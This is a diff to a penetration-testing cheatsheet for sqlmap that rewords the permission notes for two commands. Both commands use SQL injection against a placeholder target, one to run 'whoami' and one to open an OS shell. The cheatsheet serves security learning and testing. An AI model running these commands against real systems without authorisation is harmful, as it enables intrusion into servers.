tymyrddin/cheatsheets/source/docs/databases/sqlmap-cheatsheet.md

 ## Shell

-Execute a command (requires permission):
+Execute a command (requires permissions):

     # sqlmap -u "<target>/<pagename>.php?id=1" --os-cmd whoami

-Simple shell (will not work when not having the permissions:
+Simple shell (requires permissions or a file inclusion vulnerability in any of the applications on the webserver):

     # sqlmap -u "<target>/<pagename>.php?id=1" --os-shell